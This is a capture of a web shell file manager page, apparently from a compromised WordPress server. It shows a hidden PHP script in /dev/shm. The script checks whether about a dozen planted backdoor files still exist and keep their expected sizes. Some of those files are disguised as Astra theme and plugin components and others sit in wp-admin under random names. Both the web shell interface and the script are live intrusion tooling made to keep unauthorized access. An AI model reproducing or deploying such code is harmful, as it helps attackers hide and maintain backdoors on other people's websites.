D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.pgrp
back
Copy
<?php $r = '/home/houscjmf/techinverse.net'; $x = ["/wp-content/themes/astra/inc/addons/transparent-header/classes/sections/index.astra.customizer.transparent.transparent.configs.configs.php"=>"bd@@36609@@798", "/wp-content/plugins/astra-sites/inc/classes/compatibility/uabb/class.astra.sites.compatibility.uabb.php"=>"bd@@36657@@840", "/wp-content/themes/astra/inc/builder/type/header/primary-header/dynamic-css/Thanikudithanam.php"=>"bd@@15165@@873", "/wp-content/plugins/astra-sites/admin/bsf-analytics/modules/deactivation-survey/classes/class.deactivation.survey.feedback.php"=>"bd@@15688@@873", "/wp-admin/connCsUcy.php"=>"bd@@6770@@964", "/wp-content/themes/astra/inc/builder/type/header/below-header/dynamic-css/cleanup.lib.php"=>"bd@@36217@@976", "/wp-admin/response.php"=>"bd@@6551@@896", "/wp-content/themes/astra/inc/compatibility/learndash/customizer/sections/layout/class.astra.learndash.general.configs.php"=>"bd@@15514@@995", "/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/compatibility/uag/ai.builder.compatibility.uag.php"=>"bd@@15010@@906", "/wp-content/themes/astra/inc/builder/type/header/site-identity/class.astra.header.site.identity.component.loader.php"=>"bd@@36289@@968", "/wp-admin/2wQCNhpaq8K.php"=>"bd@@23499@@36335", "/wp-content/themes/astra/inc/builder/type/footer/widget/dynamic-css/cancel.php"=>"bd@@15343@@1019", "/wp-content/themes/astra/inc/builder/type/header/primary-header/class.astra.primary.header.loader.php"=>"bd@@36348@@882"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');